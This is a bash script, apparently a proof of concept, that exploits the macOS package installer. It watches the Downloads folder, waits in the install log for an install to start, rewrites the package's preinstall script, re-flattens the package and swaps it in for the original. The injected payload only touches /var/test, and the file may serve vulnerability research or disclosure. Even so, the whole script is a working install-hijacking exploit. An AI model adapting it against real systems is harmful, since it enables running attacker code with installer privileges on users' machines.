#!/bin/bash

declare -r touch_path="/var/test"
declare -r expand_path="/tmp/Install"
declare possible_target


echo "Monitoring ~/Downloads for .pkg or .dmg files..."


while true; do
  if echo ~/Downloads/* | grep -q '.dmg\|.pkg'; then
    echo "Possible targets found..."
    possible_target=$(echo ~/Downloads/* | grep '.dmg\|.pkg')
    break
  fi
  
  sleep 2
  # Sleep so we don't run ls 6 times a second
done


if [[ "${possible_target}" =~ .pkg ]]; then
  rm -rf "${expand_path:?}"
  pkgutil --expand-full "${possible_target}" "${expand_path}"
fi


if preinstall_script=$(find /tmp/Install/ -name 'preinstall'); then
  echo 'preinstall target found...'
elif postinstall_script=$(find /tmp/Install/ -name 'postinstall'); then
  echo 'postinstall target found...'
fi

echo "Waiting for PKG installer to start..."
( tail -f -n 0  /var/log/install.log & ) | grep -q 'Opened from:' 

echo "PKG Install Detected"
pkg_path=$(grep 'Opened from:' /var/log/install.log | tail -1 | cut -d ' ' -f7-)

echo "Expanding PKG"
pkgutil --expand "${pkg_path}" "${expand_path}"

echo "Replacing preinstall"
cat <<EOF > "${preinstall_script}"
#!/bin/bash

touch /var/test
EOF

pkgutil --flatten  "${expand_path}" "${expand_path}.pkg"

echo "Flattening malicious PKG..."
pkgutil --flatten  "${expand_path}" "${expand_path}.pkg"

echo "Removing ${pkg_path}"
rm -f "${pkg_path:?}"

echo "Replacing Install.pkg with malicious PKG"
mv "${expand_path}.pkg" "${pkg_path}"

echo "Removing Expanded PKG"
rm -rf "${expand_path:?}"